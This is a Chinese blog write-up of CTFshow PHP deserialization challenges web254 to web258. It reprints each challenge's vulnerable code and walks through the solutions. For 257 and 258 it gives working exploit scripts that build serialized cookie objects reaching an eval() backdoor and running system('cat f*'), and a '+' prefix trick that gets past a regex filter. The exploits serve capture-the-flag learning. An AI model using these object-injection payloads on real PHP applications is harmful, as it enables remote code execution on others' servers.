CTFShow反序列化web254-8题wp

已于 2024-04-28 14:29:36 修改
阅读量821 收藏 11
点赞数 17
文章标签: php
于 2024-04-28 14:27:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79545986/article/details/138276827
版权
文章详细描述了解决CTFshow平台上的四个PHP编程挑战,涉及反序列化技巧,如何利用isVip布尔值和构造函数/destructor执行恶意代码,以及防止常见的安全漏洞,如rec漏洞。
摘要由CSDN通过智能技术生成

CTFshow做题记录

跟迪哥学反序列化,顺手做的几道题目,记录一下

题目:web254

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            $this->isVip=true;
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = new ctfShowUser();
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

解题思路:

  1. 触发vipOneKeyGetFlag
  2. $this->isVip为真

这题目跟反序列化没关系,主要是考验对代码逻辑是否清晰,怎么调用的

只需要/?username=xxxxxx&password=xxxxxx

在这里插入图片描述

题目:web255

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}
$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){              //检查是否传入username,password
    $user = unserialize($_COOKIE['user']);    		//传入Cookie
    if($user->login($username,$password)){				//调用login(),跳转到上面login检查username和password的值是否为xxxxxx
        if($user->checkVip()){							//检查isVip的bool值是否为真
            $user->vipOneKeyGetFlag();				//为真,就调用vipOneKeyGetFlag(),跳转到上面function
        }
    }else{
        echo "no vip,no flag";
    }
}

思路

这个题目的关键点在于isVip的bool值,代码中我们想要的是调用vipOneKeyGetFlag()这个函数,但是不管是if($user->checkVip())还是vipOneKeyGetFlag()里面的if($this->isVip),都有对isVip的bool判断,并且题目的函数中并没有对isVip布尔值的修改,我们能操作的点只有两个:

  • GET传进去username&password
  • $user = unserialize($_COOKIE['user']);

我们可以在第二个注入点中,将isVip的bool值修改成true,记得将serialize后的字符串url编码,可以用php的内置函数urlencode()
在这里插入图片描述

FLAG

抓包,把user这个参数通过Cookie传进去,把username=xxxxxx和password=xxxxxx用GET方法传进去

在这里插入图片描述

题目:256

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

思路

跟上题不一样的在于需要$this->username===$u&&$this->password===$p;,又要if($this->username!==$this->password)

所以直接在定义public变量username和password的地方直接给他改了,改成不一样的就行

Flag

在这里插入图片描述

your flag is ctfshow{ffff1dc0-b627-4337-9394-85bf0d9e6ba3}

题目:257

反序列化造成的rec漏洞

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';
    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}
class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}
class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

思路

  • 先抓源头,找到可以用eval()来getshell,我们需要调用backDoor这个类里的getInfo这个函数

  • 我们的exp里肯定是要new一个类的,所以必然会调用__construct,这个魔术方法实例化了info,info里会改变user的值,我们就无法传入值了,so需要把这个info改掉,改成backDoor

  • 让$this->class是backDoor类的实例化就可以了

  • 如果不把$this->class=new info();这个语句里的info改成backDoor,就会导致__destruct调用的时候只能进到info这个类,进不去backDoor

  • 然后要做的就是改一下code的参数, 'system("cat f*");'

    是的,您的理解是正确的。在这个PHP脚本中,ctfShowUser 类的实例化过程中,通过 $this->class=new info();info 类的一个实例赋给了 $class 属性。当 ctfShowUser 实例被销毁时,会自动调用 __destruct 方法,进而调用 $this->class->getInfo(),这里的 $this->class 指向的是之前创建的 info 类的实例。

    如果您不修改 $this->class=new info();$this->class=new backDoor();,那么即使您尝试通过某种方式注入或修改了 $user 对象(比如通过序列化/反序列化攻击),在 __destruct 方法调用时,执行的依旧是 info 类中的 getInfo() 方法,而不是 backDoor 类中的 getInfo() 方法,后者可能包含允许执行任意代码的 eval 函数。

    因此,为了利用这个脚本潜在的安全漏洞,比如执行任意代码,您需要确保 ctfShowUser 实例的 $class 属性指向的是 backDoor 类的实例,这样在对象销毁时,才能通过 backDoor 类的 getInfo() 方法执行恶意代码。这通常涉及到对 $user 对象进行序列化和反序列化的操作,并且在反序列化时篡改 $class 属性的内容,使其指向 backDoor 类。

EXP

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    private $code = 'system("cat f*");';
    public function getInfo(){
        eval($this->code);
    }
}
echo urlencode(serialize(new ctfShowUser()));
?>

Flag

在这里插入图片描述

题目:258

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 21:38:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';
    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }
}
class info{
    public $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}
class backDoor{
    public $code;
    public function getInfo(){
        eval($this->code);
    }
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}

思路

除了if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user']))加了这段过滤,跟上题没区别

过滤了o:或者c:之后加了数字,我们把后面这个数字前面加一个+就可以绕过这个正则匹配

用str_replace替换一下就好,注意要先序列化,然后替换,再urlencode,否则会出错d

exp

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $class = 'backDoor';
    public function __construct(){
        $this->class=new backDoor();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}
class backDoor{
    public $code='system("cat f*");';
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}
$a = serialize(new ctfShowUser());
$b = str_replace(':11',':+11',$a);
$c = str_replace(':8',':+8',$b);
echo urlencode($c);
?>

Flag

在这里插入图片描述

在这里插入图片描述

Sol_9
关注
  • 17
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
weblogic180417反序列化补丁--p27395085_1036_Generic
07-05
在给定的标"weblogic180417反序列化补丁--p27395085_1036_Generic"中,我们可以看到这是一款针对WebLogic Server 10.3.6的反序列化漏洞修复补丁。反序列化漏洞是软件安全中的一个重要问,通常发生在对象从序列化...
CTFshow 反序列化wp
会下雪的晴天
01-02 1255
title: CTFshow 反序列化wp date: 2020-12-02 20:03:53 categories: ctfshow link:https://yq1ng.github.io/ 说一些有的没的: payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload.
ctfshow反序列化 wp
yink12138的博客
01-04 2625
ctfshow反序列化wp
ctf-show,web入门,反序列化254~267
最新发布
2301_80548709的博客
03-23 998
而%user变量后接了一个反序列化的函数,我们只需要写一个脚本,将创建类的将本序列化,传给cookie,同时注意到,源程序种没有将isVip更改的函数,所以序列化时这里也要注意,最后将其转码为url编码即可使用。
CTFshow——web入门——反序列化web254-web278 详细Writeup
Leaf_initial的博客
08-24 2041
在做之前先简要总结一下知识点。
ctf.show反序列化(web254-web278)
wanan的博客
08-31 5578
ctf.show反序列化(web254-web278)
grpc-web-error-details:在grpc-web反序列化`grpc-status-details-bin`元数据的实用程序功能
05-15
使用时反序列化grpc-web-details-bin元数据值的实用程序功能。 动机 。 由错误状态代码和可选的字符串错误消息组成的标准错误模型是“官方” gRPC错误模型。 如果您使用的是协议缓冲区,则还可以使用Google开发和...
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
第38天:WEB漏洞-反序列化PHP&JAVA全解(下)1
08-03
中的“WEB漏洞-反序列化PHP&JAVA全解(下)”指的是关于Web应用程序安全领域的一个重要话,即PHP和JAVA平台上的反序列化漏洞。反序列化漏洞是由于程序在处理序列化数据时没有充分验证输入,从而允许攻击者构造...
ctfshow web入门反序列化 web254-257
m0_62207170的博客
04-21 554
ctfshow web入门反序列化 web254-257
ctfshow web 反序列化(web254-278)
qq_50589021的博客
09-04 6260
知识储备 随笔分类 - PHP常识 PHP中的魔术变量: __sleep() //执行serialize()时,先会调用这个函数 __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符时绕过) __construct() //当对象被创建时,会触发进行初始化 __destruct() //对象被销毁时触发 __toString(): //当一个对象被当作字符串使用时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中
web254
姜小孩的博客
06-29 214
附代码: 这道很简单,大概思路就是让你Get传参一个username和password,下面的if是检查是否为空,不为空就调用ctfShowUser里面的login方法,传入的username变成了$u,传入的password变成了$p。下面的if就是在判断isVip是否为ture,可以看到一开始这里的的isVip是false的,所以如果username和password的值和ctfShowUser里面的username和password的值分别相同,那么就让isVip变成Ture,我们就可
ctfshow 反序列化Web254-255
m0_62584974的博客
04-21 2227
2022/4/17 反序列化漏洞的产生主要有以下两个原因: 1. unserialize 函数的参数可控。 2.存在魔法函数。 魔法函数 __construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__invoke,__set_state,__clone和__debuginfo等成员函数在PHP中被称为魔法函数。在命名自己的类方法时不能使用这些名称,除非是想使用其
CTFshow刷日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 2655
反序列化 web254-简单审计 这个是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
ctfshow反序列化(web254-web266)
m0_72125469的博客
01-20 1270
ctfshow web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266
ctfshow web入门 反序列化254~257详解)
WRplayeR的博客
04-12 404
php反序列化的简单学习
ctfshow web入门 反序列化
Sentiment的博客
12-26 1830
web254
ctfshow反序列化
09-09
引用中的代码展示了一个类`ctfshow`,其中包含了一个`__destruct`方法,该方法在对象被销毁时会输出一个变量`$flag`的值。该类的序列化结果被输出并展示了如何利用`__destruct`方法来获取`$flag`的值。 引用中的代码展示了另一个类`ctfshowvip`,其中`password`属性被设置为包含恶意代码的字符串,利用`__destruct`方法中的弱比较漏洞,可以构造一个恶意的序列化payload来执行任意代码。 引用中的代码展示了一个修改后的类`ctfShowUser`,其中通过构造函数将`isVip`属性设置为`true`。通过构造一个链式调用,可以构造一个序列化的payload来实现`$this->isVip`值为`true`的反序列化攻击。 综上所述,ctfshow的反序列化攻击可以通过构造恶意的序列化payload来利用`__destruct`方法或弱比较漏洞来执行任意代码或获取敏感信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值